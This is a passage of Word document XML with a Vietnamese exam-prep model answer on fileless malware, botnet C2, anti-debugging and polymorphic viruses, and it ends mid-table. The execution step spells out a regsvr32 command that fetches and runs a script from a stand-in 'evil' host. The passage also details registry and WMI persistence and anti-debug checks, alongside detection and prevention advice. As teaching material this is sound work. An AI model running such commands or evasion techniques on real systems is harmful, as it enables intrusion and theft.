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1871A" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📝</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CÂU 1 TỰ LUẬN — DỰ ĐOÁN NĂM NAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F68C0EC" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nhận định format:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Dựa theo năm trước, câu 1 kết hợp </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tình huống vận dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> (công ty ABC bị XYZ) + </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lý thuyết cơ chế</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> bên trong. Hai chủ đề có xác suất cao nhất là:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BDEB5D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chủ đề 1 (~70%):</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Fileless Malware + Botnet C2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB0927" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chủ đề 2 (~50%):</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Anti-Debug + Virus Đa hình + Rối mã</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199B0A1E" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">Dưới đây là đáp án mẫu cho </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>từng chủ đề theo đúng format tình huống năm trước</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDFD86B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="503E5145">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="057E7191" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CHỦ ĐỀ 1 — FILELESS MALWARE + BOTNET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED78258" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Công ty ABC phát hiện máy nhân viên gửi dữ liệu ra ngoài định kỳ, CPU tăng bất thường, kết nối về IP lạ sau mỗi 5 phút, nhưng quét AV không thấy file độc hại nào trên đĩa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB04C6E" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>① Loại malware:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:br/>
        <w:t>Fileless Malware kết hợp Botnet. Không có PE file trên disk → AV signature-based vô hiệu. Máy nạn nhân trở thành bot/zombie kết nối định kỳ về C2 server (beacon pattern).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6270BEFF" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>② Hậu quả giấu hiệu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5C2ED4" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Không có file lạ trên disk → AV không phát hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D4DF6" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Hành vi giống admin hợp lệ (PowerShell, WMI) → qua mặt EDR đơn giản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B24B321" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Beacon mỗi N giây → trông như traffic bình thường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F8CDE2" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Persistence qua Registry/WMI → reboot vẫn tái nhiễm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF293A" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>③ Cơ chế hoạt động (5 bước):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDD4C8C" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Delivery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Phishing email → macro Office/PDF → PowerShell one-liner exec; hoặc exploit RCE (EternalBlue) → shellcode thẳng vào RAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CE4C5C" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execution (LoLBins):</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> powershell.exe -enc &lt;Base64&gt; tải payload về RAM không ghi disk; regsvr32.exe /s /n /u /i:http://evil/payload.sct scrobj.dll (Squiblydoo bypass AppLocker); wmic.exe process call create exec qua WMI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0054336D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C2 (Botnet):</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Bot gửi HTTP GET/POST beacon về C2 mỗi N giây; dùng </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DGA</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> (250 domain/ngày như Conficker) hoặc </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fast-flux DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> (IP xoay liên tục) → tránh blacklist; C2 trả lệnh DDoS/exfiltrate/download module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39459372" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence (không cần file):</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Registry HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run lưu encoded </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:lastRenderedPageBreak/>
        <w:t>PowerShell (Kovter, Poweliks); WMI Subscription __EventFilter + CommandLineEventConsumer tự trigger khi boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3654C2" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Data Exfiltration qua HTTPS; Lateral Movement qua SMB (Emotet → TrickBot → Ryuk); Cryptojacking chiếm CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685E5E41" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>④ Phòng chống &amp; Khắc phục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0752E445" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Khắc phục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120BD9D3" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Phát hiện: Sysmon Event ID 1 (cmdline), 3 (network), 8 (CreateRemoteThread), 25 (ProcessTampering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB03450" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Memory forensics: Volatility malfind, ldrmodules tìm shellcode trong RAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D3D7E6" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Xóa persistence: kiểm tra HKCU\...\Run, HKLM\...\Run, WMI subscription (Get-WMIObject __EventFilter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170E6FB2" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Cô lập → image memory → rebuild máy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDFAAAD" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Phòng chống:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A36C5D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">Bật </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AMSI</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> scan PowerShell/VBScript trước exec + </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Script Block Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> (Event ID 4104)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32810A7F" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Constrained Language Mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t>; chặn LoLBins (regsvr32, mshta, certutil) qua AppLocker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C7465" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>EDR behavioral analysis: phát hiện anomaly parent-child (Word → PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1089FA65" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>DNS sinkhole DGA domains; block beacon pattern qua NGFW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1857B4E8" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="01C09930">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C3F54E" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CHỦ ĐỀ 2 — ANTI-DEBUG + VIRUS ĐA HÌNH + RỐI MÃ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A6A70D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Công ty ABC phát hiện mẫu mã độc liên tục thay đổi chữ ký, vô hiệu hóa debugger khi phân tích, và AV không thể nhận diện dù đã cập nhật signature mới nhất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B635EFD" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>① Loại malware:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:br/>
        <w:t>Polymorphic/Metamorphic Virus tích hợp Anti-Analysis. Tự biến đổi cấu trúc mỗi lần lây nhiễm → signature cũ vô hiệu. Phát hiện môi trường debug → thay đổi hành vi → cản trở reverse engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3FCB67" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>② Hậu quả giấu hiệu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006B10CE" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Signature thay đổi mỗi infection → AV phải update liên tục vẫn không theo kịp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26704EE8" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:lastRenderedPageBreak/>
        <w:t>Anti-debug → mã độc hành xử bình thường khi bị phân tích → đánh lừa sandbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8FEA3B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Obfuscation → static analysis (IDA, strings) không đọc được URL/API/C2 address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5519B781" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>③ Cơ chế hoạt động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A1BEC2" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Anti-Debug:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161FEBBA" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>IsDebuggerPresent() → đọc PEB.BeingDebugged tại fs:[30h]+0x02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A2EA7A" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">NtGlobalFlag tại PEB+0x68 → giá trị </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x70</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> khi debug (FLG_HEAP flags)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A3518" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>rdtsc đo delta CPU cycle giữa 2 lệnh → delta lớn bất thường → có debugger step-through</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA3AD57" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>INT scanning: quét byte 0xCC (INT3) trong .text section → phát hiện breakpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3DB15B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Hardware BP: GetThreadContext() đọc DR0-DR3, nếu ≠ 0 → có hardware breakpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC9C63A" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3 cấp độ Mutation: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6"/>
        <w:gridCol w:w="3345"/>
        <w:gridCol w:w="2333"/>
        <w:gridCol w:w="2396"/>
      </w:tblGrid>
      <w:tr w:rsidR="00451406" w:rsidRPr="00451406" w14:paraId="1031F8AC" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AC67490" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A729BD1" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00451406">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Oligomorphic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D08327" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00451406">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Polymorphic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F447464" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00451406">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Metamorphic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00451406" w:rsidRPr="00451406" w14:paraId="5B94E8AF" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="681D97E1" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Decryptor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="525871D2" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Tập cố định, xoay vòng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26137263" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Sinh mới mỗi lần (mutation engine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5318056C" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
            <w:r w:rsidRPr="00451406">
              <w:t>Không có decryptor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00451406" w:rsidRPr="00451406" w14:paraId="281EC35A" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
